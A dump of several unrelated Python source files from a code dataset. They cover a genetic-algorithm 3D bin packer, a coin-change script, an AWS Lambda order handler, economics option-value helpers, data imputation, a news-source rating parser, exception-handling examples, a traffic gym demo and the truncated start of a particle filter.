item.new_l:\n if pack_it.position.y + pack_it.new_w > position.y:\n rotation+=1\n flag = 1\n\n if pack_it.position.x < position.x and pack_it.position.x + pack_it.new_l > position.x:\n if position.y + item.new_w > pack_it.position.y:\n rotation+=1\n flag = 1\n\n if pack_it.position.y > position.y and position.y + item.new_w > pack_it.position.y:\n if pack_it.position.x + pack_it.new_l > pack_it.position.x:\n rotation+=1\n flag = 1\n if pack_it.position.y < position.y and pack_it.position.y + pack_it.new_w > position.y:\n if position.x + item.new_l > pack_it.position.x:\n rotation+=1\n flag = 1\n if flag == 0:\n if position.z == 0:\n item.rotation = rotation\n return 1\n for i in Cont.PI:\n if i.position.z + i.h == position.z and i.position.x == position.x and i.position.y == position.y:\n if position.x + item.new_l > 1.3*(i.position.x+i.new_l) or position.y + item.new_w > 1.3*(i.position.y+i.new_w):\n rotation+=1\n flag = 1\n break\n if i.position.z + i.h == position.z:\n if i.position.x > position.x and i.position.x < position.x + item.new_l:\n if position.x + item.new_l > 1.3*(i.position.x + i.l):\n rotation+=1\n flag = 1\n break\n if i.position.x < position.x and i.position.x + i.l > position.x:\n if position.x + item.l > 1.3*(i.position.x + i.l - position.x):\n rotation+=1\n flag = 1\n break\n if i.position.y > position.y and i.position.y < position.y + item.new_w:\n if position.y + item.new_w > 1.3*(i.position.y + i.w):\n rotation+=1\n flag = 1\n break\n if i.position.y < position.y and i.position.y + i.w > position.y:\n if position.y + item.w > 1.3*(i.position.y + i.w - position.y):\n rotation+=1\n flag = 1\n break\n \n if flag == 0:\n item.rotation = rotation \n return 1\n return 0\n\ndef DBLF(Cont, item): \n Cont.PP = sorted(Cont.PP, key = lambda pos: (pos.x, pos.z, pos.y))\n for position in Cont.PP:\n if check(position, item, Cont):\n item.position = position\n Cont.PI.append(item) \n Cont.UP.append(position)\n update_lict_C (Cont, item)\n return 
1\n return 0\n\n\ndef update_lict_C (Cont, item): \n MPL = 0\n for pi in Cont.PI:\n if MPL < pi.position.x + pi.new_l:\n MPL = pi.position.x + pi.new_l\n \n MP_x = MP_y = 0\n if item.position.z == 0:\n if coord(item.position.x + item.new_l, item.position.y, 0) not in Cont.UP:\n Cont.PP.append(coord(item.position.x + item.new_l, item.position.y, 0))\n if coord(item.position.x, item.position.y + item.new_w, 0) not in Cont.UP:\n Cont.PP.append(coord(item.position.x, item.position.y + item.new_w, 0))\n \n else:\n for pi in Cont.PI:\n if pi.position.x < item.position.x + item.new_l and pi.position.y < item.position.y + item.new_w\\\n\t\tand pi.position.x + pi.new_l > item.position.x + item.new_l and pi.position.y + pi.new_w > item.position.y:\n if pi.position.z + pi.new_h <= item.position.z and pi.position.z + pi.new_h > MP_x:\n MP_x = pi.position.z + pi.new_h\n if pi.position.x < item.position.x + item.new_l and pi.position.y < item.position.y + item.new_w\\\n\t\tand pi.position.x + pi.new_l > item.position.x and pi.position.y + pi.new_w > item.position.y + item.new_w:\n if pi.position.z + pi.new_h <= item.position.z and pi.position.z + pi.new_h > MP_y:\n MP_y = pi.position.z + pi.new_h\n break\n if coord(item.position.x + item.new_l, item.position.y , MP_x) not in Cont.UP:\n Cont.PP.append(coord(item.position.x + item.new_l, item.position.y , MP_x))\n if coord(item.position.x, item.position.y + item.new_w, MP_y) not in Cont.UP:\n Cont.PP.append(coord(item.position.x, item.position.y + item.new_w, MP_y))\n if coord(item.position.x, item.position.y, item.position.z + item.new_h) not in Cont.UP:\n Cont.PP.append(coord(item.position.x, item.position.y, item.position.z + item.new_h))\n if item.position.x + item.new_l > MPL:\n if coord(MPL, 0, 0) in Cont.PP:\n Cont.PP.remove(coord(MPL, 0, 0))\n MPL = item.position.x + item.new_l\n if coord(MPL, 0, 0) not in Cont.UP:\n Cont.PP.append(coord(MPL, 0, 0))\n \n Cont.PP = list(set(Cont.PP))\n if item.position in Cont.PP:\n Cont.PP.remove(item.position) \n for pp in Cont.PP:\n if pp.x == Cont.L or pp.y == Cont.W or pp.z == Cont.H:\n Cont.PP.remove(pp)\n \n\ndef LLSF(list_C, IP):\n global L, W, H\n solution = list_C.copy()\n for i in IP:\n solution = sorted(solution, key = lambda pos: (pos.left_space), reverse = True)\n for box in solution:\n flag = 0\n if box.left_space - i.volume >=0:\n if DBLF(box, i):\n box.left_space = box.left_space - i.volume\n flag = 1\n break\n if flag == 0:\n new_box = container(len(solution),L,W,H)\n DBLF(new_box, i)\n new_box.left_space = new_box.left_space - i.volume\n solution.append(new_box) \n return solution \n\n\ndef export_solution(solution,filename,info):\n solution_table = pd.DataFrame([], columns=['Номер контейнера', 'Номер объекта', 'x', 'y', 'z',\n 'l','w','h','Поворот', 'new l', 'new w', 'new h'])\n \n \n for fill_cont in solution: \n for item in fill_cont.PI:\n solution_table.loc[len(solution_table)] = [fill_cont.id, item.id, item.position.x, \n item.position.y, item.position.z,\n item.l, item.w, item.h, item.rotation, item.new_l, item.new_w, item.new_h]\n \n info_table = pd.DataFrame([], columns=['Нижняя граница', 'Число контейнеров', 'Фитнес значение', 'Время работы', \n 'Номер успешной популяции', 'Время на поиски лучшего индивида'])\n info_table.loc[len(info_table)] = [i for i in info]\n \n writer = pd.ExcelWriter(filename + '.xlsx', engine='xlsxwriter') \n solution_table.to_excel(writer, sheet_name='Информация об упаковке') \n info_table.to_excel(writer, sheet_name='Общая информация')\n writer.save()\n \n 
\ndef LB(IP):\n global L, W, H\n sum_items = 0\n for i in IP:\n sum_items+= i.volume \n return ceil(sum_items/(L * H * W))\n \ndef fitness_value(solution):\n Ncont = len(solution)\n k = L*W*H\n #k = 1000\n left_spaces = [(cont.left_space/k)**2 for cont in solution]\n V = sum(left_spaces)\n return Ncont*k + V\n \n\ndef get_population_fitness_dictionary(population, LB): \n fitness_dict = {}\n for i in range(len(population)):\n list_C = [container(j, L,W,H) for j in range(LB)]\n solution = LLSF(list_C, population[i])\n fitness = fitness_value(solution)\n fitness_dict[i] = fitness\n return fitness_dict\n\n\ndef crossover(population_fitness_dictionary, population):\n def get_probability_list(population_fitness_dictionary, population):\n fitness = population_fitness_dictionary.values()\n total_fit = float(sum(fitness))\n relative_fitness = [f/total_fit for f in fitness]\n probabilities = [sum(relative_fitness[:i+1]) \n for i in range(len(relative_fitness))]\n return probabilities\n\n def roulette_wheel_pop(population, probabilities, number):\n chosen = []\n for n in range(number):\n r = random.random()\n for (i, individual) in enumerate(population):\n if r <= probabilities[i]:\n chosen.append(list(individual))\n break\n return chosen\n \n def get_i_j(max_bound):\n x = random.randint(1, max_bound - 1)\n y = random.randint(x, max_bound)\n return x, y\n\n \n \n def control(child, parent):\n parentp = parent.copy()\n new_child = child.copy()\n for gen in child:\n if gen in parentp:\n parentp.remove(gen)\n else:\n new_child.remove(gen)\n new_child.extend(parentp)\n return new_child\n \n \n \n def get_child(population_fitness_dictionary, population):\n parents = roulette_wheel_pop(population, get_probability_list(population_fitness_dictionary, population), 2)\n first_parent, second_parent = parents[0], parents[1]\n i, j = get_i_j(len(first_parent))\n сhild_first = first_parent.copy()\n сhild_second = second_parent.copy()\n сhild_first[i:j], сhild_second[i:j] = сhild_second[i:j], сhild_first[i:j].copy() #переставили и получили детей\n\n if np.random.choice([0,1], p=[0.99, 0.01]): #мутация \n i, j = get_i_j(len(сhild_first)-1)\n сhild_first[i], сhild_second[j] = сhild_second[j], сhild_first[i]\n\n \n сhild_first = control(сhild_first, first_parent)\n сhild_second = control(сhild_second, second_parent) \n \n \n list_C = [container(i, L,W,H) for i in range(LoundB)] \n fitness_child_first = fitness_value(LLSF(list_C, сhild_first))\n \n list_C = [container(i, L,W,H) for i in range(LoundB)] \n fitness_child_second = fitness_value(LLSF(list_C, сhild_second))\n \n list_C = [container(i, L,W,H) for i in range(LoundB)] \n fitness_first_parent = fitness_value(LLSF(list_C, parents[0]))\n \n list_C = [container(i, L,W,H) for i in range(LoundB)] \n fitness_second_parent = fitness_value(LLSF(list_C, parents[1]))\n \n \n if fitness_child_first>fitness_first_parent and fitness_child_first>fitness_second_parent\\\n\tand fitness_child_second>fitness_first_parent and fitness_child_second>fitness_second_parent:\n return сhild_first, сhild_second\n \n if fitness_first_parent>fitness_child_first and fitness_first_parent>fitness_child_second\\\n\tand fitness_second_parent>fitness_child_first and fitness_second_parent>fitness_child_second:\n return first_parent, second_parent \n \n if fitness_first_parent>fitness_child_second and fitness_first_parent>fitness_second_parent\\\n\tand fitness_child_first>fitness_child_second and fitness_child_first>fitness_second_parent:\n return first_parent, сhild_first\n \n if 
fitness_first_parent>fitness_second_parent and fitness_first_parent>fitness_child_first\\\n\tand fitness_child_second>fitness_second_parent and fitness_child_second>fitness_child_first:\n return first_parent, сhild_second\n \n if fitness_second_parent>fitness_first_parent and fitness_second_parent>fitness_child_second\\\n\tand fitness_child_first>fitness_first_parent and fitness_child_first>fitness_child_second:\n return second_parent, сhild_first\n \n if fitness_second_parent>fitness_first_parent and fitness_second_parent>fitness_child_first\\\n\tand fitness_child_second>fitness_first_parent and fitness_child_second>fitness_child_first:\n return second_parent, сhild_second\n \n else:\n return сhild_first, сhild_second\n \n new_population = [get_child(population_fitness_dictionary, population) for i in range(5)]\n return list(sum(new_population, ())) \n\n\ndef generation_first_population(sequence, number): \n \n population = [list(np.random.permutation(sequence)) for i in range(number-4)]\n population.append(sorted(sequence, key = lambda pos: (pos.volume), reverse = True))\n population.append(sorted(sequence, key = lambda pos: (pos.h), reverse = True))\n population.append(sorted(sequence, key = lambda pos: (pos.l), reverse = True)) \n population.append(sorted(sequence, key = lambda pos: (pos.w), reverse = True))\n \n return population\n\n\ndef get_key(d, value):\n for k, v in d.items():\n if v == value:\n return k\n \n\ndef drawSolution(solution,filename):\n def drawItem(ax,xx,yy,z,ll,ww, h, color):\n y, x, l, w = xx, yy, ww, ll\n r1 = [0,l]\n r2 = [0,w]\n X, Y = np.meshgrid(r1, r2)\n ax.plot_surface(x+X,y+Y,z, alpha=1, color=color, edgecolor = 'black', linewidth=2) # bottom\n ax.plot_surface(x+X,y+Y,z + h, alpha=1, color=color, edgecolor = 'black', linewidth=2) #top\n\n r3 = [0,l]\n r4 = [0,h]\n X, Y = np.meshgrid(r3, r4)\n ax.plot_surface(x+X,y,z+Y, alpha=1, color=color, edgecolor = 'black', linewidth=2) # front\n ax.plot_surface(x+X,y+w,z+Y, alpha=1, color=color, edgecolor = 'black', linewidth=2) # back\n\n r5 = [0,w]\n r6 = [0,h]\n X, Y = np.meshgrid(r5, r6)\n ax.plot_surface(x+0,y+X,z+Y, alpha=1, color=color, edgecolor = 'black', linewidth=2) # left\n ax.plot_surface(x+l,y+X,z+Y, alpha=1, color=color, edgecolor = 'black', linewidth=2) # right\n \n \n def drawContainer(ax, Cont):\n all_color = ['#F08080', '#DC143C', '#FFB6C1', '#C71585', '#FFA500', '#EEE8AA', '#8A2BE2', '#00008B', '#008000', '#66CDAA']\n\n for item in Cont.PI:\n i = copy.deepcopy(item)\n color = random.choice(all_color) \n drawItem(ax,i.position.x,i.position.y,i.position.z,i.new_l,i.new_w,i.new_h, color)\n \n for C in solution:\n fig = plt.figure()\n fig.suptitle('3D bin packing', fontsize=10, fontweight='bold')\n ax = fig.gca(projection='3d')\n ax.set_xlabel('Y')\n ax.set_ylabel('X')\n ax.set_zlabel('Z')\n \n drawContainer(ax, C)\n ax.set_xlim3d(0, C.L)\n ax.set_ylim3d(C.W, 0)\n ax.set_zlim3d(0, C.H)\n plt.show()\n fig.savefig(filename + str(C.id) + '.png', dpi=500)\n \n \ndef work(filename):\n\t#print(arguments[1])\n\t#filename = arguments[1]\n global L,W,H\n global best_individ\n global best_fit\n time_start = time.time()\n IP = get_collection(filename)\n LoundB = LB(IP)\n population = generation_first_population(IP, 10)\n pop_dict = get_population_fitness_dictionary(population, LoundB)\n best_fit = min(pop_dict.values())\n print(pop_dict)\n print(best_fit)\n\n best_individ = population[get_key(pop_dict, min(pop_dict.values()))]\n list_C = [container(i, L,W,H) for i in range(LoundB)]\n best_sol = LLSF(list_C, 
best_individ)\n print(len(best_sol))\n time_best = time.time()\n num_best_population = 1\n count_population = 1\n\n if len(best_sol) == LoundB:\n search_time = round(time_best - time_start, 4) \n time_finish = time.time()\n list_C = [container(i, L,W,H) for i in range(LoundB)] \n time_of_work = round(time_finish - time_start, 4)\n best_solution = LLSF(list_C, best_individ)\n info = [LoundB, len(best_solution), best_fit, time_of_work, num_best_population, search_time] \n export_solution(best_solution,filename, info)\n drawSolution(best_solution,filename)\n return best_sol\n else :\n while len(best_sol) != LoundB: \n population = crossover(pop_dict, population)\n count_population +=1\n pop_dict = get_population_fitness_dictionary(population, LoundB) \n if min(pop_dict.values()) < best_fit:\n \n best_fit = min(pop_dict.values())\n best_individ = population[get_key(pop_dict, min(pop_dict.values()))]\n time_best = time.time()\n num_best_population = count_population\n list_C = [container(i, L,W,H) for i in range(LoundB)]\n best_sol = LLSF(list_C, best_individ)\n \n search_time = round(time_best - time_start, 4) \n \n \n \n time_finish = time.time()\n list_C = [container(i, L,W,H) for i in range(LoundB)] \n time_of_work = round(time_finish - time_start, 4)\n best_solution = LLSF(list_C, best_individ)\n info = [LoundB, len(best_solution), best_fit, time_of_work, num_best_population, search_time] \n export_solution(best_solution,filename, info)\n drawSolution(best_solution,filename)\n return best_solution\n\n","sub_path":"BnPmy.py","file_name":"BnPmy.py","file_ext":"py","file_size_in_byte":26677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"98840078","text":"import random\r\nimport CoinCase\r\nimport sys\r\n\r\n# create coin case\r\n# case also dreats a withdrawal amount and mod 5, 10, and 25\r\nCC = CoinCase.CoinCase()\r\n# print case contents\r\nCC.caseContains()\r\n\r\n# print withdrawal amount\r\nprint('Try to withdraw ' + str(CC.withdraw))\r\n\r\n\r\ndef getCoins(): # find solution when perfect solution is an option\r\n holdArray = []\r\n solutionFound = False\r\n while not solutionFound:\r\n if CC.withdraw > 0:\r\n if CC.mod25 != 0 or CC.quarters == 0:\r\n if CC.withdraw >= 50 and CC.quarters > 1:\r\n CC.withdraw -= 50\r\n holdArray.append('quarter')\r\n CC.removeCoin('quarter')\r\n holdArray.append('quarter')\r\n CC.removeCoin('quarter')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n elif CC.withdraw >= 35 and CC.dimes > 0 and CC.quarters > 0 and (checkForPerfectSolution(CC.withdraw - 35)):\r\n CC.withdraw -= 35\r\n holdArray.append('dime')\r\n CC.removeCoin('dime')\r\n holdArray.append('quarter')\r\n CC.removeCoin('quarter')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n elif CC.withdraw >= 30 and CC.nickels > 0 and CC.quarters > 0 and (checkForPerfectSolution(CC.withdraw - 30)):\r\n CC.withdraw -= 30\r\n holdArray.append('nickel')\r\n CC.removeCoin('nickel')\r\n holdArray.append('quarter')\r\n CC.removeCoin('quarter')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n else:\r\n if CC.mod10 != 0 or CC.dimes == 0:\r\n if CC.mod5 != 0 or CC.nickels == 0:\r\n CC.withdraw -= 1\r\n holdArray.append('penny')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n else:\r\n CC.withdraw -= 5\r\n holdArray.append('nickel')\r\n CC.removeCoin('nickel')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n else:\r\n CC.withdraw -= 10\r\n holdArray.append('dime')\r\n CC.removeCoin('dime')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n else:\r\n CC.withdraw -= 25\r\n 
holdArray.append('quarter')\r\n CC.removeCoin('quarter')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n else:\r\n solutionFound = True\r\n return [solutionFound, holdArray]\r\n\r\n\r\n# boolean stating whether or not an exact amount is possible\r\nEAB = True\r\n\r\n\r\ndef checkForPerfectSolution(wA): # this function returns EAB ture or false\r\n global EAB\r\n amount = wA\r\n # is there enough to withdraw\r\n if amount > CC.total:\r\n print('Unable to withdraw ' + str(CC.withdraw) +\r\n ' cents. NOT enough money in the piggy bank.')\r\n sys.exit()\r\n else:\r\n # mod 10 check\r\n if CC.mod10 == 0:\r\n # mod 5 check\r\n if CC.mod5 == 0:\r\n EAB = True\r\n else:\r\n # pennies check\r\n if CC.pennies >= CC.mod5:\r\n EAB = True\r\n else:\r\n EAB = False\r\n else:\r\n # mod 5 check\r\n if CC.mod5 == 0:\r\n # pennies check\r\n if CC.pennies >= 5 or CC.nickels > 1:\r\n EAB = True\r\n else:\r\n EAB = False\r\n else:\r\n # pennies check\r\n if CC.pennies >= CC.mod5:\r\n EAB = True\r\n else:\r\n EAB = False\r\n\r\n\r\n# run the check\r\ncheckForPerfectSolution(CC.withdraw)\r\n\r\nif EAB:\r\n solutionFound = getCoins()\r\nelse:\r\n # add one to withdrawal amount until EAB is true, if it isn't already\r\n while not EAB:\r\n CC.withdraw += 1\r\n CC.getMod(CC.withdraw)\r\n checkForPerfectSolution(CC.withdraw)\r\n # get coins if true\r\n solutionFound = getCoins()\r\n\r\n\r\nif solutionFound[0]:\r\n for item in solutionFound[1]:\r\n print(item)\r\n","sub_path":"CoinProblem.py","file_name":"CoinProblem.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"392431414","text":"import json\nimport os\nfrom ordering import place_order\nfrom uuid import uuid4\n\ndef lambda_handler(request, context):\n # validation\n if not 'photos' in request:\n raise Exception('photos needs to be provided')\n \n if not 'email' in request:\n raise Exception('email is required')\n \n if len(request['photos']) <= 1:\n raise Exception('not enough photos selected')\n \n QUEUE_URL = os.getenv('QUEUE_URL')\n place_order(QUEUE_URL, {\n 'email': request['email'],\n 'photos': request['photos'],\n 'request_id': str(uuid4())\n })\n \n return {\n 'statusCode': 200,\n 'body': \"OK\"\n }\n","sub_path":"app-backend/place-order/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"328285617","text":"\"\"\"This module contains auxiliary functions for the analysis in the option value project.\"\"\"\nimport pickle as pkl\nimport shutil\nimport glob\nimport os\n\nimport numpy as np\n\nfrom ov_tools.objects.auxiliary_shared import get_benefits_education\n\nimport respy\n\n\ndef get_option_values_education(period, current_state, config_dict):\n \"\"\"This function calculates the option value.\"\"\"\n scenarios = ['base', 'truncated']\n\n if os.path.exists('option_value_calculation'):\n shutil.rmtree('option_value_calculation')\n os.mkdir('option_value_calculation')\n os.chdir('option_value_calculation')\n\n for scenario in scenarios:\n\n os.mkdir(scenario)\n os.chdir(scenario)\n respy_obj = respy.RespyCls(config_dict['INIT_FILE'])\n\n edu_spec = respy_obj.get_attr('edu_spec')\n\n if scenario in ['base']:\n pass\n elif scenario in ['truncated']:\n edu_spec['max'] = current_state['edu'] + 1\n else:\n raise NotImplementedError\n\n respy_obj.unlock()\n respy_obj.set_attr('edu_spec', edu_spec)\n respy_obj.lock()\n\n 
respy_obj.write_out('model.respy.ini')\n\n rslt = get_benefits_education(period, current_state, respy_obj)\n\n pkl.dump(rslt, open('rslt_benefits.respy.pkl', 'wb'))\n\n os.chdir('../')\n\n # Now we are ready to compute the option values. There is only a single option value associated\n # with each state, however the option value contribution is actually heterogeneous due to the\n # random shock?!\n ov_calculation, rslt = dict(), dict()\n for scenario in scenarios:\n os.chdir(scenario)\n rslt = pkl.load(open('rslt_benefits.respy.pkl', 'rb'))\n\n ov_calculation[scenario] = rslt['total_values'][:, 2]\n\n os.chdir('../')\n\n rslt['option_values'] = ov_calculation['base'] - ov_calculation['truncated']\n rslt['option_value_contribs'] = rslt['option_values'] / ov_calculation['base']\n\n pkl.dump(rslt, open('rslt_option_values.respy.pkl', 'wb'))\n\n os.chdir('../')\n\n\ndef option_value_analysis(which, period, current_state, config_dict):\n \"\"\"This function allows to analyze the effect of uncertainty and nonlinearities on the option\n value of human capital investment.\"\"\"\n # We need to prepare a sound directory structure.\n dirname = which\n if os.path.exists(dirname):\n shutil.rmtree(dirname)\n\n os.mkdir(dirname)\n os.chdir(dirname)\n\n for i in range(5):\n label = '{}'.format(i)\n os.mkdir(label)\n os.chdir(label)\n\n respy_obj = respy.RespyCls(config_dict['INIT_FILE'])\n\n optim_paras = respy_obj.get_attr('optim_paras')\n\n shocks_cholesky = optim_paras['shocks_cholesky']\n\n if which == 'uncertainty':\n # We first construct the scaled covariance matrix and than integrate it's cholesky\n # factor into the class instance.\n cov = np.matmul(shocks_cholesky, shocks_cholesky.T)\n scaling_matrix = np.identity(4) * (1.00 + i * 0.1)\n cov = np.matmul(np.matmul(scaling_matrix, cov), scaling_matrix.T)\n optim_paras['shocks_cholesky'] = np.linalg.cholesky(cov)\n elif which == 'nonlinearities':\n # We need to specify the grid of coefficient to trace out the effect of nonlinearities.\n optim_paras = respy_obj.get_attr('optim_paras')\n optim_paras['coeffs_a'][6:8] = float('0.0{:}'.format(i))\n optim_paras['coeffs_b'][6:8] = float('0.0{:}'.format(i))\n else:\n raise NotImplementedError\n\n respy_obj.unlock()\n respy_obj.attr['optim_paras'] = optim_paras\n respy_obj.lock()\n\n respy_obj.write_out()\n\n get_option_values_education(period, current_state, config_dict)\n\n os.chdir('../')\n\n os.chdir('../')\n\n _aggregate_results(which)\n\n\ndef _aggregate_results(which):\n \"\"\"This function simply creates an easily accessible *.pkl dictionary with the results for\n further processing.\"\"\"\n cwd = os.getcwd()\n os.chdir(which)\n\n dirnames = glob.glob('*')\n dirnames.sort()\n\n rslt = dict()\n rslt['level'], rslt['option_value'] = [], []\n\n for dirname in dirnames:\n os.chdir(dirname)\n fname = 'option_value_calculation/rslt_option_values.respy.pkl'\n rslt['option_value'] += [pkl.load(open(fname, 'rb'))['option_values'][0]]\n rslt['level'] += [int(dirname)]\n os.chdir('../')\n pkl.dump(rslt, open(which + '.respy.pkl', 'wb'))\n\n os.chdir(cwd)\n\n\ndef dist_input_arguments(parser):\n \"\"\"Check input for estimation script.\"\"\"\n # Parse arguments\n args = parser.parse_args()\n\n # Distribute arguments\n is_debug = args.is_debug\n\n # Check attributes\n assert (is_debug in [True, False])\n\n # Finishing\n return 
is_debug,\n","sub_path":"ov_tools/objects/auxiliary_option.py","file_name":"auxiliary_option.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"429276072","text":"import csv\nimport numpy as np\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.impute import KNNImputer\nfrom datetime import datetime\nfrom datetime import timedelta as td\n\naodData = np.zeros(365)\npm25Data = np.zeros(365)\ni = 0\n\nwith open('047file.csv') as csv_file:\n    csv_reader = csv.reader(csv_file, delimiter=',')\n    for row in csv_reader:\n        value = row[1]\n        if value == '':\n            aodData[i] = np.nan\n        else:\n            aodData[i] = value\n        i += 1\n#print(aodData)\n\ni = 0\npm25Data[308] = np.nan\nwith open('pm25.csv') as csv_file:\n    csv_reader = csv.reader(csv_file, delimiter=',')\n    for row in csv_reader:\n        if i > 307:\n            pm25Data[i+1] = row[4]\n        else:\n            pm25Data[i] = row[4]\n        # print(row[0])\n        # print(row[4])\n        # print(i)\n        # print(pm25Data[i])\n        i += 1\n#print(pm25Data)\n\ncompleteData = np.zeros((365,2))\n#print(completeData)\nfor row in range(0,365):\n    completeData[row,0] = aodData[row]\n    completeData[row,1] = pm25Data[row]\n\n#print(completeData)\n\nimputer = KNNImputer(n_neighbors=4, weights=\"uniform\")\nimputedData = imputer.fit_transform(completeData)\n\n#print(imputedData)\n\ncurrentDate = datetime.strptime('2010-01-01', '%Y-%m-%d')\nendDate = datetime.strptime('2011-01-01', '%Y-%m-%d')\nf = open('imputed047.csv','w')\nnl = '\\n'\ni = 0\n\nwhile currentDate < endDate:\n    f.write(currentDate.strftime('%Y-%m-%d') + ',' + str(imputedData[i,0]) + nl)\n    currentDate = currentDate + td(days=1)\n    i += 1\n    ","sub_path":"analysis/source/Impute.py","file_name":"Impute.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"478752347","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/4/5 22:17\n# @Author : qxm\n# @FileName: exception.py\n\n# try:\n#     open(\"abc.txt\",'r')    # open the nonexistent file abc.txt\n# except FileNotFoundError:  # FileNotFoundError catches the missing-file exception\n#     print(\"an exception occurred\")\n\n# try:\n#     print(a)    # print the undefined variable a\n# except NameError:  # NameError catches the undefined-variable exception\n#     print(\"an exception occurred\")\n\n# try:\n#     open(\"abc.txt\",'r')    # open the nonexistent file abc.txt\n# except BaseException:  # BaseException catches exceptions of every type\n#     print(\"an exception occurred\")\n#\n# try:\n#     open(\"abc.txt\",'r')    # open the nonexistent file abc.txt\n# except BaseException as msg:  # BaseException catches every exception; msg receives the exception message\n#     print(msg)\n#\n# try:\n#     open(\"abc.txt\",'r')    # open the nonexistent file abc.txt\n# except Exception as msg:  # Exception catches every exception and inherits from BaseException\n#     print(msg)\n\n# try:\n#     open(\"abc.txt\",'r')    # open the nonexistent file abc.txt\n# except Exception as msg:  # Exception catches every exception and inherits from BaseException\n#     print(msg)\n# else:\n#     print('runs only when no exception occurs')  # the code above raised an exception, so this line is not executed\n\n# try:\n#     open(\"abc.txt\",'r')    # open the nonexistent file abc.txt\n# except Exception as msg:  # Exception catches every exception and inherits from BaseException\n#     print(msg)\n# finally:\n#     print('runs whether or not an exception occurred above')\n\n\n# Raising an exception\n# define the say_hello() function\ndef say_hello(name=None):\n    if name is None:\n        raise Exception('\"name\" cannot be empty')   # raise throws the exception\n    else:\n        print(\"hello,%r\" % name)\n\nsay_hello()   # call the say_hello() function","sub_path":"chs/chs1/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"245323411","text":"import gym\nimport gym_traffic\nfrom gym.wrappers import Monitor\nimport gym\nimport time\nfrom tqdm import tqdm\nmonitor = 
False\n#env = gym.make('Traffic-Simple-gui-v0')\n#env = gym.make('Traffic-Simple-cli-v0')\n#env = gym.make('Traffic-DCMed-gui-v0')\n#env = gym.make('Traffic-2way-gui-v0')\n#env = gym.make('Traffic-litteRiver-gui-v0')\nenv = gym.make('Traffic-yIntersection-gui-v0')\n#env = gym.make('Traffic-Simple-gui-v0')\nif monitor:\n    env = Monitor(env, \"output/traffic/simple/random\", force=True)\nfor i_episode in tqdm(range(500)):\n    observation = env.reset()\n    for t in tqdm(range(1000)):\n        #env.render()\n        #print(observation)\n        action = env.env.action_space.sample() # two envs are needed. The first is a time limited wrapper, the second is the actual env.\n        #time.sleep(1)\n        observation, reward, done, info = env.step(action)\n        print(\"Observation: \", end=\"\")\n        print(observation[0], end=\" \")\n        print(observation[1])\n        print(\"Reward: \", end=\"\")\n        print(reward)\n        print(\"Done: \", end=\"\")\n        print(done)\n        print(\"Info: \", end=\"\")\n        print(info)\n        print(\"-------------------------------------------------\")\n        #print \"Reward: {}\".format(reward)\n        if done:\n            #print(\"Episode finished after {} timesteps\".format(t+1))\n            break\n","sub_path":"examples/example_gym_traffic_random.py","file_name":"example_gym_traffic_random.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"612022618","text":"import ratings\n\n\nclass Parser:\n\n    def __init__(self, url):\n        # Global variables\n        self.address = url\n        self.list = 'leanings.txt'\n        self.trusted = ['bbc',\n                        'npr',\n                        'pbs',\n                        'wsj',\n                        'abc',\n                        'cbs',\n                        'nbc',\n                        'cnn',\n                        'usatoday']\n\n    def parse(self):\n        # Sends address to recommended and not recommended methods.\n        # Returns a recommendation\n        r = self.recommended()\n        nr = self.not_recommended()\n        r_score = r - nr + self.compare_known_sources()\n        if r_score > 1:\n            return ratings.Ratings.RECOMMENDED\n        elif r_score < -1:\n            return ratings.Ratings.NOT_RECOMMENDED\n        else:\n            return ratings.Ratings.UNCERTAIN\n\n    def not_recommended(self):\n        # Assigns a not_recommended score to a url\n        score = 0\n        # Check for known urls\n        if 'com.co' in self.address:\n            score -= 2\n        return score\n\n    def recommended(self):\n        # Assigns a recommended score to a url\n        score = 0\n        # Check for known urls\n        for s in self.trusted:\n            if s in self.address:\n                score += 1\n        return score\n\n    def build_leanings_index(self):\n        # Returns leanings of known sources\n        leanings = []\n        filename = self.list\n        with open(filename) as inputfile:\n            for line in inputfile:\n                leanings.append(line.strip().split('\\t'))\n        return leanings\n\n    def compare_known_sources(self):\n        # Returns a -1, 0, or 1 depending on source leanings\n        index = self.build_leanings_index()\n        for i in index:\n            print(i)\n            if self.address in i[3]:\n                if i[1] == 'Center':\n                    return 1\n                else:\n                    return -1\n        return 0","sub_path":"Backend/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"622514661","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 30 17:45:05 2018\n\n@author: hirvoasa\n\"\"\"\nimport numpy as np\nfrom numpy.linalg import inv\nfrom algos.utils import sqrt_svd, SIR_resampling\n\ndef PF(dx, T, dy, xb, B, Q, R, Nf, f, H, obs, prng): \n    sqQ = sqrt_svd(Q)\n    sqB = sqrt_svd(B)\n    Xa = np.zeros([dx, Nf, T+1])\n    Xf = np.zeros([dx, Nf, T])\n    Xf_for = np.zeros([dx, Nf, T])\n    Wa = np.zeros([Nf, T+1])\n    Wa[:,0] = 1/Nf*np.ones(Nf) \n    # Initialize ensemble\n    for i 
